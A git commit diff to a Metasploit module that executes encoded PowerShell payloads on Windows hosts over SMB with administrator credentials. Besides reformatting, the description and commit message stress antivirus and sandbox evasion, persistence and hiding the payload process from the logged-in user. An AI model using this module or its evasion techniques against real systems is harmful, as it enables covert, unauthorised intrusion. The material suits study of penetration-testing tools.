This commit completes powershell based psexec

RageLtMan · RageLtMan · commit 92ef462c34ea · 2013-02-04T20:39:05.000-05:00
The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match rapid7#1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,18 +1,17 @@
 # -*- coding: binary -*-
-#!/usr/bin/env ruby
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-    Rank = ManualRanking
+		Rank = ManualRanking
 
 	# Exploit mixins should be called first
-  include Msf::Exploit::Remote::DCERPC
-  include Msf::Exploit::Remote::SMB
-  include Msf::Exploit::Remote::SMB::Authenticated
-  include Msf::Exploit::Powershell
-  include Msf::Auxiliary::Report
-  include Msf::Exploit::EXE
+	include Msf::Exploit::Remote::DCERPC
+	include Msf::Exploit::Remote::SMB
+	include Msf::Exploit::Remote::SMB::Authenticated
+	include Msf::Exploit::Powershell
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::EXE
 
 	# Aliases for common classes
 	SIMPLE = Rex::Proto::SMB::SimpleClient
@@ -24,40 +23,42 @@ def initialize(info = {})
 			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
 			'Description'    => %q{
 					This module uses a valid administrator username and password to execute a powershell
-        payload using a similar technique to the "psexec" utility provided by SysInternals. The
-        payload is encoded in base64 and executed from the commandline using the -encodedcommand
-        flag. Using this method, the payload is never written to disk, and given that each payload
-        is unique, is not prone to signature based detection. Since executing shellcode in .NET
-        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
-        must match that of the payload. Lastly, a persist option is provided to execute the payload
-        in a while loop in order to maintain a form of persistence. In the event of a sandbox
-        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				payload using a similar technique to the "psexec" utility provided by SysInternals. The
+				payload is encoded in base64 and executed from the commandline using the -encodedcommand
+				flag. Using this method, the payload is never written to disk, and given that each payload
+				is unique, is not prone to signature based detection. Since executing shellcode in .NET
+				requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
+				must match that of the payload. Lastly, a persist option is provided to execute the payload
+				in a while loop in order to maintain a form of persistence. In the event of a sandbox
+				observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				In order to avoid interactive process notifications for the current user, the psh payload has
+				been reduced in size and wrapped in a powershell invocation which hides the process entirely.
 			},
 
 			'Author'         => [
 				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
-        'RageLtMan <rageltman[at]sempervictus' # PSH exploit
+				'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
 			],
 
 			'License'        => MSF_LICENSE,
-      'Privileged'     => true,
-      'DefaultOptions' =>
-        {
-          'WfsDelay'     => 10,
-          'EXITFUNC' => 'thread'
-        },
-      'Payload'        =>
-        {
-          'Space'        => 8192,
-          'DisableNops'  => true,
-          'StackAdjustment' => -3500
-        },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
-        ],
-      'DefaultTarget'  => 0,
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 10,
+					'EXITFUNC' => 'thread'
+				},
+			'Payload'        =>
+				{
+					'Space'        => 8192,
+					'DisableNops'  => true,
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
 			'References'     => [
 				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
 				[ 'OSVDB', '3106'],
@@ -67,20 +68,20 @@ def initialize(info = {})
 			]
 		))
 
-    register_options([
-      OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
-      OptBool.new('RUN_WOW64', [
-              false,
-              'Execute powershell in 32bit compatibility mode, payloads need native arch',
-              false
-      ]),
-      OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
-    ], self.class)
+		register_options([
+			OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+			OptBool.new('RUN_WOW64', [
+							false,
+							'Execute powershell in 32bit compatibility mode, payloads need native arch',
+							false
+			]),
+			OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
+		], self.class)
 	end
 
 
-  def exploit
-    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
+	def exploit
+		command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
 
 		#Try and authenticate with given credentials
 		if connect
@@ -90,15 +91,15 @@ def exploit
 				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
 				return
 			end
-      # Execute the powershell command
-      begin
-        print_status("#{peer} - Executing the payload...")
-        #vprint_good(command)
-        return psexec(command)
-      rescue StandardError => exec_command_error
-        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-        return false
-      end
+			# Execute the powershell command
+			begin
+				print_status("#{peer} - Executing the payload...")
+				vprint_good(command)
+				return psexec(command)
+			rescue StandardError => exec_command_error
+				print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+				return false
+			end
 			disconnect
 		end
 	end
@@ -224,8 +225,8 @@ def psexec(command)
 		return true
 	end
 
-  def peer
-    return "#{rhost}:#{rport}"
-  end
+	def peer
+		return "#{rhost}:#{rport}"
+	end
 
 end
